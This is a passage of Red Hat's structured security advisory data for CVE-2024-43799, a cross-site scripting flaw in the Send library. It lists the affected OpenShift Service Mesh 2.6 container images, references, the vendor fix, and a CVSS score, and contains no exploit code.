"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", 